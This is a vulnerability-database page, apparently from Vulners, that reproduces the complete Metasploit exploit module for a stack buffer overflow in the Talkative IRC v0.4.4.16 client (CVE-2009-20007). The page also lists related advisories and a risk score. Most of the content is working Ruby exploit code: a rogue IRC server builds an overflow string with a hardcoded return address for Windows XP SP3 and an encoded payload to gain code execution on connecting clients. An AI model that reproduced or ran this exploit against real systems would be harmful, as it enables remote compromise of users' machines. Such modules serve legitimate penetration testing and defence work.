Lucene search
+L

Talkative IRC v0.4.4.16 Response Buffer Overflow

🗓️ 17 Mar 2009 00:00:00Reported by MC <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 20 Views

Talkative IRC version 0.4.4.16 buffer overflow exploi

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
attackerkb
CVE-2009-20007
16 Sep 202514:34
–attackerkb
circl
Circl
CVE-2009-20007
29 May 201815:50
–circl
cnnvd
CNNVD
Talkative IRC 安全漏洞
16 Sep 202500:00
–cnnvd
cve
CVE
CVE-2009-20007
16 Sep 202514:34
–cve
cvelist
Cvelist
CVE-2009-20007 Talkative IRC v0.4.4.16 Response Buffer Overflow
16 Sep 202514:34
–cvelist
euvd
EUVD
EUVD-2009-5125
7 Oct 202500:30
–euvd
nvd
NVD
CVE-2009-20007
16 Sep 202515:15
–nvd
ptsecurity
Positive Technologies
PT-2025-38003
16 Sep 202500:00
–ptsecurity
rapid7
Rapid7 Vulnerability Database (full)
CVE-2009-20007: Stack-based Buffer Overflow
16 Sep 202500:00
–rapid7
redhatcve
RedhatCVE
CVE-2009-20007
18 Sep 202515:27
–redhatcve
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::TcpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Talkative IRC v0.4.4.16 Response Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.
          When a specially crafted response string is sent to a client,
          an attacker may be able to execute arbitrary code.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2009-20007' ],
          [ 'OSVDB', '64582'],
          [ 'BID', '34141' ],
          [ 'EDB', '8227' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
          'AllowWin32SEH' => true
        },
        'Payload' => {
          'Space' => 750,
          'BadChars' => "\x00\x0a\x20\x0d",
          'StackAdjustment' => -3500,
          'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [ 'Windows XP SP3 English',	{ 'Ret' => 0x72d1146b } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2009-03-17',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The IRC daemon port to listen on", 6667 ])
      ]
    )
  end

  def on_client_connect(client)
    res = ":irc_server.stuff 001 jox :Welcome to the Internet Relay Network jox\r\n"
    client.put(res)
  end

  def on_client_data(client)
    return unless regenerate_payload(client)

    sploit = ":" + rand_text_alpha_upper(272) + Rex::Arch::X86.jmp_short(6)
    sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + payload.encoded
    sploit << " PRIVMSG " + rand_text_alpha(rand(10) + 1)
    sploit << " : /FINGER " + rand_text_alpha(rand(10) + 1) + ".\r\n"

    client.put(sploit)

    handler
    service.close_client(client)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2009 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 49.3
EPSS0.01398
SSVC
20